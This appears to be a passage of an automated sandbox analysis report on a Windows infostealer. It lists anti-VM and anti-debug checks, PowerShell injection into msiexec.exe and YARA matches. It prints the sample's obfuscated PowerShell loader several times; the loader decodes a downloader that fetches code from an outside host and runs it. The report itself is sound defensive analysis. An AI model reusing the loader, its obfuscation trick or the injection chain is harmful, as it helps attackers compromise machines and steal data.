              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,13_2_00407898
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_00418981 memset,GetSystemInfo,10_2_00418981
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: msiexec.exe, 00000008.00000002.3010031908.0000000000676000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWALOT
              Source: powershell.exe, 00000001.00000002.1914587566.00000112FE560000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2045907923.0000000007015000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3010031908.000000000061A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3010031908.0000000000676000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: bhv9E46.tmp.10.drBinary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
              Source: powershell.exe, 00000001.00000002.1898960358.00000112F5F61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2039511100.00000000057BE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: QEMu?
              Source: wscript.exe, 00000000.00000002.1741242627.0000029266129000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\erSmar
              Source: wscript.exe, 00000000.00000003.1739959471.0000029266130000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: terfacevmicheartbeatHyper-V Data Exchange Service
              Source: bhv9E46.tmp.10.drBinary or memory string: https://config.edge.skype.com/config/v1/Skype/1446_8.53.0.77?OSVer=10.0.19045.2006&ClientID=RHTiQUpXOaQeBtbq%2B7LgJauNdx5lF%2FQ%2FOy2qwXRNGjU%3D&Manufacturer=VMware%2C%20Inc.&Model=VMware20%2C1&Language=en&Locale=en-US
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_044696F9 LdrInitializeThunk,3_2_044696F9
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FC72639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_1FC72639
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,10_2_0040DD85
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,10_2_004044A4
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FC74AB4 mov eax, dword ptr fs:[00000030h]8_2_1FC74AB4
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FC7724E GetProcessHeap,8_2_1FC7724E
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FC72B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_1FC72B1C
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FC72639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_1FC72639
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FC760E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_1FC760E2

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
              Source: Yara matchFile source: amsi64_4948.amsi.csv, type: OTHER
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4948, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2060, type: MEMORYSTR
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 3B90000Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#slagtstavles Talepdagogs Regnskabsafdelings Wardwomen Yokeage #>;$Ganespalter144='Triumferne';<#Whirler Kjepladser Fllesmngde #>;$Gader=$adawe+$host.UI;If ($Gader) {$Fuglearter++;}function Drunkometer($Microfibril){$Reflation=$Elektromotoren+$Microfibril.'Length'-$Fuglearter; for( $Apoplastogamous=3;$Apoplastogamous -lt $Reflation;$Apoplastogamous+=4){$Wettability='Compotation';$Forbrugermotiveringer223+=$Microfibril[$Apoplastogamous];$Dimetient='Rememberers';}$Forbrugermotiveringer223;}function Fusionsdokumentet($Achlorhydria){ &($Companioning) ($Achlorhydria);}$Malie=Drunkometer 'smaM unospuz kaiProlplal ssaO,s/ste5Dep. la0Rep sca( rWB,uiD.mnResdVekoFa wC ms ud BifNFreTRoi Kog1Bes0Apo.Cal0sip;Fir eW B.iP rnsto6pro4 at; Ni abexCa.6Ma 4 ct;Ite Gulrsu,vsev:kos1 la2s.l1 Gr.The0Ged)Udk subGBone DocBl kg,loste/Pre2Pon0Mat1 Un0Reh0F.r1Emb0Dod1Dyp BreFHypiCharsnae spf amo R xPla/Ha.1 u2H t1Goi.run0D,r ';$Partitioned=Drunkometer 'Domuou,sU teNonR El-CocaGerGEddeRhoNT gtInd ';$Konkursbehandlingens=Drunkometer 'dephDatt.lmtPispC u:In /Cli/ jee stq P u C iInspBud4 K .Ti.sAnahGeloTheppon/ChiF unvAvlMNymV ModEelpOveFslug,ra/ExtAsaftEn oHollTrosWov.CivrAstaP.arMer ';$Afspadseringspenge=Drunkometer 's,a>Dif ';$Companioning=Drunkometer ' ui BrEC.xXMik ';$Congressist='Banditter';$Flunkeyhood='\Plasmagel.Ref';Fusionsdokumentet (Drunkometer ' R $,drGIs l oOga BEx Aseklatt:Tr,ILrerMumRsvvIspaGantAskybAcalencyEpa=La,$s,vE B NCanvR a:Renast PHigpsupD Boa ssTFika f+Rin$MulFPhelsugu,erNsenksaleTesy OpHC looveoBe.DBrn ');Fusionsdokumentet (Drunkometer 'Bip$Hypg T LKrooMarBTa A.shlbas:Vanb ndAR.cD ale riFPleo TjRs lms oAspra Cal R E M T,ri=Unf$Tr K nooNoun ftKMisuKrirP,dsLasBForE skHIntANo NsafD,ecL.ugI N nBlag H.e,einsp s su.ThescolPLamLMaair,iTRib( fo$ ChaCo f PlsUd.PPupaResdAe s lyEUptRB liB kN soG ,dsBisPNgteUd.N C G,niePsa) Ac ');Fusionsdokumentet (Drunkometer 'Tio[chinU iE veTifr.salsEleE Unr favAulIH lCst.eQuapsenoRapIBa,NA eTK lM Kra A.N BeABioGRege ImRByl]sam:Re : Tys iEcopCLeoUGrur GaIEndtHeaY appAf.rUnroFutTParO CoCspao roLsp U.v=Jor on[TorNdukEetat o.No.s .oE b.cAriU A,rpomi anTL,eYLftPUroRProOPhitMalOLntC Dio orLRumt UdYAlap VaEs r]Ani: on:OrdTPauldatsAba1Bld2Dis ');$Konkursbehandlingens=$Badeformaalet[0];$Tilkendegivelsers=(Drunkometer 'Ma $Te.g,ynLwhoORe,bUnsAK slPse: reHAddi.ndlNonIPlu=UfonAlke ,eWMas-UdlOViob urjsniEBeaCDistElf Op sB sytahsseeTKlae ivMI,o. alNBefEObjtsne. unWBagesukbGaucsupLseeiXl E KnNsogTRjs ');Fusionsdokumentet ($Tilkendegivelsers);Fusionsdokumentet (Drunkometer ' ac$DemH sli smlBefi Ph.PinHR ieUn aOrddFodeKarrUresspe[ am$ urPAngaI.dr MatFatiG ntTiliUmboM snProePurdT,t]Upp=Kla$segMTamaPoll oriAf eFot ');$Daddocky=Drunkometer ' pu$La HTe,i valDipiP,l.BygDdoroE,awB dnParlMesoPo aTapdEnuFE,hitrnl MoeGri(Dat$MonKcosoUgjnsqukabsu VarGifsDrubUnceA.kh aaForn T ds,mlLitiDisnsuhgHile ednsi somb,Don$GelB AtaUdvjeJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ofdalrlortndq"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ofdalrlortndq"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\yzitlkwhfcfqsvnu"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\yzitlkwhfcfqsvnu"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\bbodmcpjtkxucbcyfoug"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" " <#slagtstavles talepdagogs regnskabsafdelings wardwomen yokeage #>;$ganespalter144='triumferne';<#whirler kjepladser fllesmngde #>;$gader=$adawe+$host.ui;if ($gader) {$fuglearter++;}function drunkometer($microfibril){$reflation=$elektromotoren+$microfibril.'length'-$fuglearter; for( $apoplastogamous=3;$apoplastogamous -lt $reflation;$apoplastogamous+=4){$wettability='compotation';$forbrugermotiveringer223+=$microfibril[$apoplastogamous];$dimetient='rememberers';}$forbrugermotiveringer223;}function fusionsdokumentet($achlorhydria){ &($companioning) ($achlorhydria);}$malie=drunkometer 'smam unospuz kaiprolplal ssao,s/ste5dep. la0rep sca( rwb,uid.mnresdvekofa wc ms ud bifnfretroi kog1bes0apo.cal0sip;fir ew b.ip rnsto6pro4 at; ni abexca.6ma 4 ct;ite gulrsu,vsev:kos1 la2s.l1 gr.the0ged)udk subgbone docbl kg,loste/pre2pon0mat1 un0reh0f.r1emb0dod1dyp brefhypicharsnae spf amo r xpla/ha.1 u2h t1goi.run0d,r ';$partitioned=drunkometer 'domuou,su tenonr el-cocagergedderhont gtind ';$konkursbehandlingens=drunkometer 'dephdatt.lmtpispc u:in /cli/ jee stq p u c iinspbud4 k .ti.sanahgelotheppon/chif unvavlmnymv modeelpovefslug,ra/extasaften oholltroswov.civrastap.armer ';$afspadseringspenge=drunkometer 's,a>dif ';$companioning=drunkometer ' ui brec.xxmik ';$congressist='banditter';$flunkeyhood='\plasmagel.ref';fusionsdokumentet (drunkometer ' r $,drgis l ooga bex aseklatt:tr,ilrermumrsvvispagantaskybacalencyepa=la,$s,ve b ncanvr a:renast phigpsupd boa sstfika f+rin$mulfphelsugu,ernsenksaletesy ophc looveobe.dbrn ');fusionsdokumentet (drunkometer 'bip$hypg t lkroomarbta a.shlbas:vanb ndar.cd ale rifpleo tjrs lms oaspra cal r e m t,ri=unf$tr k noonoun ftkmisukrirp,dslasbfore skhintano nsafd,ecl.ugi n nblag h.e,einsp s su.thescolplamlmaair,itrib( fo$ chaco f plsud.ppuparesdae s lyeuptrb lib kn sog ,dsbispngteud.n c g,niepsa) ac ');fusionsdokumentet (drunkometer 'tio[chinu ie vetifr.salselee unr favaulih lcst.equapsenorapiba,na etk lm kra a.n beabiogrege imrbyl]sam:re : tys iecopcleougrur gaiendtheay appaf.runrofuttparo cocspao rolsp u.v=jor on[torndukeetat o.no.s .oe b.cariu a,rpomi antl,eylftpurorproophitmalolntc dio orlrumt udyalap vaes r]ani: on:ordtpauldatsaba1bld2dis ');$konkursbehandlingens=$badeformaalet[0];$tilkendegivelsers=(drunkometer 'ma $te.g,ynlwhoore,bunsak slpse: rehaddi.ndlnoniplu=ufonalke ,ewmas-udloviob urjsniebeacdistelf op sb sytahsseetklae ivmi,o. alnbefeobjtsne. unwbagesukbgaucsuplseeixl e knnsogtrjs ');fusionsdokumentet ($tilkendegivelsers);fusionsdokumentet (drunkometer ' ac$demh sli smlbefi ph.pinhr ieun aorddfodekarruresspe[ am$ urpangai.dr matfatig nttiliumbom snproepurdt,t]upp=kla$segmtamapoll oriaf efot ');$daddocky=drunkometer ' pu$la hte,i valdipip,l.bygddoroe,awb dnparlmesopo atapdenufe,hitrnl moegri(dat$monkcosougjnsqukabsu vargifsdrubuncea.kh aaforn t ds,mllitidisnsuhghile ednsi somb,don$gelb ataudvje
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" " <#slagtstavles talepdagogs regnskabsafdelings wardwomen yokeage #>;$ganespalter144='triumferne';<#whirler kjepladser fllesmngde #>;$gader=$adawe+$host.ui;if ($gader) {$fuglearter++;}function drunkometer($microfibril){$reflation=$elektromotoren+$microfibril.'length'-$fuglearter; for( $apoplastogamous=3;$apoplastogamous -lt $reflation;$apoplastogamous+=4){$wettability='compotation';$forbrugermotiveringer223+=$microfibril[$apoplastogamous];$dimetient='rememberers';}$forbrugermotiveringer223;}function fusionsdokumentet($achlorhydria){ &($companioning) ($achlorhydria);}$malie=drunkometer 'smam unospuz kaiprolplal ssao,s/ste5dep. la0rep sca( rwb,uid.mnresdvekofa wc ms ud bifnfretroi kog1bes0apo.cal0sip;fir ew b.ip rnsto6pro4 at; ni abexca.6ma 4 ct;ite gulrsu,vsev:kos1 la2s.l1 gr.the0ged)udk subgbone docbl kg,loste/pre2pon0mat1 un0reh0f.r1emb0dod1dyp brefhypicharsnae spf amo r xpla/ha.1 u2h t1goi.run0d,r ';$partitioned=drunkometer 'domuou,su tenonr el-cocagergedderhont gtind ';$konkursbehandlingens=drunkometer 'dephdatt.lmtpispc u:in /cli/ jee stq p u c iinspbud4 k .ti.sanahgelotheppon/chif unvavlmnymv modeelpovefslug,ra/extasaften oholltroswov.civrastap.armer ';$afspadseringspenge=drunkometer 's,a>dif ';$companioning=drunkometer ' ui brec.xxmik ';$congressist='banditter';$flunkeyhood='\plasmagel.ref';fusionsdokumentet (drunkometer ' r $,drgis l ooga bex aseklatt:tr,ilrermumrsvvispagantaskybacalencyepa=la,$s,ve b ncanvr a:renast phigpsupd boa sstfika f+rin$mulfphelsugu,ernsenksaletesy ophc looveobe.dbrn ');fusionsdokumentet (drunkometer 'bip$hypg t lkroomarbta a.shlbas:vanb ndar.cd ale rifpleo tjrs lms oaspra cal r e m t,ri=unf$tr k noonoun ftkmisukrirp,dslasbfore skhintano nsafd,ecl.ugi n nblag h.e,einsp s su.thescolplamlmaair,itrib( fo$ chaco f plsud.ppuparesdae s lyeuptrb lib kn sog ,dsbispngteud.n c g,niepsa) ac ');fusionsdokumentet (drunkometer 'tio[chinu ie vetifr.salselee unr favaulih lcst.equapsenorapiba,na etk lm kra a.n beabiogrege imrbyl]sam:re : tys iecopcleougrur gaiendtheay appaf.runrofuttparo cocspao rolsp u.v=jor on[torndukeetat o.no.s .oe b.cariu a,rpomi antl,eylftpurorproophitmalolntc dio orlrumt udyalap vaes r]ani: on:ordtpauldatsaba1bld2dis ');$konkursbehandlingens=$badeformaalet[0];$tilkendegivelsers=(drunkometer 'ma $te.g,ynlwhoore,bunsak slpse: rehaddi.ndlnoniplu=ufonalke ,ewmas-udloviob urjsniebeacdistelf op sb sytahsseetklae ivmi,o. alnbefeobjtsne. unwbagesukbgaucsuplseeixl e knnsogtrjs ');fusionsdokumentet ($tilkendegivelsers);fusionsdokumentet (drunkometer ' ac$demh sli smlbefi ph.pinhr ieun aorddfodekarruresspe[ am$ urpangai.dr matfatig nttiliumbom snproepurdt,t]upp=kla$segmtamapoll oriaf efot ');$daddocky=drunkometer ' pu$la hte,i valdipip,l.bygddoroe,awb dnparlmesopo atapdenufe,hitrnl moegri(dat$monkcosougjnsqukabsu vargifsdrubuncea.kh aaforn t ds,mllitidisnsuhghile ednsi somb,don$gelb ataudvje
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" " <#slagtstavles talepdagogs regnskabsafdelings wardwomen yokeage #>;$ganespalter144='triumferne';<#whirler kjepladser fllesmngde #>;$gader=$adawe+$host.ui;if ($gader) {$fuglearter++;}function drunkometer($microfibril){$reflation=$elektromotoren+$microfibril.'length'-$fuglearter; for( $apoplastogamous=3;$apoplastogamous -lt $reflation;$apoplastogamous+=4){$wettability='compotation';$forbrugermotiveringer223+=$microfibril[$apoplastogamous];$dimetient='rememberers';}$forbrugermotiveringer223;}function fusionsdokumentet($achlorhydria){ &($companioning) ($achlorhydria);}$malie=drunkometer 'smam unospuz kaiprolplal ssao,s/ste5dep. la0rep sca( rwb,uid.mnresdvekofa wc ms ud bifnfretroi kog1bes0apo.cal0sip;fir ew b.ip rnsto6pro4 at; ni abexca.6ma 4 ct;ite gulrsu,vsev:kos1 la2s.l1 gr.the0ged)udk subgbone docbl kg,loste/pre2pon0mat1 un0reh0f.r1emb0dod1dyp brefhypicharsnae spf amo r xpla/ha.1 u2h t1goi.run0d,r ';$partitioned=drunkometer 'domuou,su tenonr el-cocagergedderhont gtind ';$konkursbehandlingens=drunkometer 'dephdatt.lmtpispc u:in /cli/ jee stq p u c iinspbud4 k .ti.sanahgelotheppon/chif unvavlmnymv modeelpovefslug,ra/extasaften oholltroswov.civrastap.armer ';$afspadseringspenge=drunkometer 's,a>dif ';$companioning=drunkometer ' ui brec.xxmik ';$congressist='banditter';$flunkeyhood='\plasmagel.ref';fusionsdokumentet (drunkometer ' r $,drgis l ooga bex aseklatt:tr,ilrermumrsvvispagantaskybacalencyepa=la,$s,ve b ncanvr a:renast phigpsupd boa sstfika f+rin$mulfphelsugu,ernsenksaletesy ophc looveobe.dbrn ');fusionsdokumentet (drunkometer 'bip$hypg t lkroomarbta a.shlbas:vanb ndar.cd ale rifpleo tjrs lms oaspra cal r e m t,ri=unf$tr k noonoun ftkmisukrirp,dslasbfore skhintano nsafd,ecl.ugi n nblag h.e,einsp s su.thescolplamlmaair,itrib( fo$ chaco f plsud.ppuparesdae s lyeuptrb lib kn sog ,dsbispngteud.n c g,niepsa) ac ');fusionsdokumentet (drunkometer 'tio[chinu ie vetifr.salselee unr favaulih lcst.equapsenorapiba,na etk lm kra a.n beabiogrege imrbyl]sam:re : tys iecopcleougrur gaiendtheay appaf.runrofuttparo cocspao rolsp u.v=jor on[torndukeetat o.no.s .oe b.cariu a,rpomi antl,eylftpurorproophitmalolntc dio orlrumt udyalap vaes r]ani: on:ordtpauldatsaba1bld2dis ');$konkursbehandlingens=$badeformaalet[0];$tilkendegivelsers=(drunkometer 'ma $te.g,ynlwhoore,bunsak slpse: rehaddi.ndlnoniplu=ufonalke ,ewmas-udloviob urjsniebeacdistelf op sb sytahsseetklae ivmi,o. alnbefeobjtsne. unwbagesukbgaucsuplseeixl e knnsogtrjs ');fusionsdokumentet ($tilkendegivelsers);fusionsdokumentet (drunkometer ' ac$demh sli smlbefi ph.pinhr ieun aorddfodekarruresspe[ am$ urpangai.dr matfatig nttiliumbom snproepurdt,t]upp=kla$segmtamapoll oriaf efot ');$daddocky=drunkometer ' pu$la hte,i valdipip,l.bygddoroe,awb dnparlmesopo atapdenufe,hitrnl moegri(dat$monkcosougjnsqukabsu vargifsdrubuncea.kh aaforn t ds,mllitidisnsuhghile ednsi somb,don$gelb ataudvjeJump to behavior
              Source: msiexec.exe, 00000008.00000002.3010031908.0000000000676000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager'
              Source: msiexec.exe, 00000008.00000002.3010031908.0000000000676000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: msiexec.exe, 00000008.00000002.3010031908.0000000000676000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager"
              Source: msiexec.exe, 00000008.00000002.3010031908.0000000000666000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3010031908.0000000000699000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FC72933 cpuid 8_2_1FC72933
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FC72264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,8_2_1FC72264
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,12_2_004082CD
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0041739B GetVersionExW,10_2_0041739B
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 00000008.00000002.3010031908.000000000061A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.3010031908.0000000000666000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 3808, type: MEMORYSTR
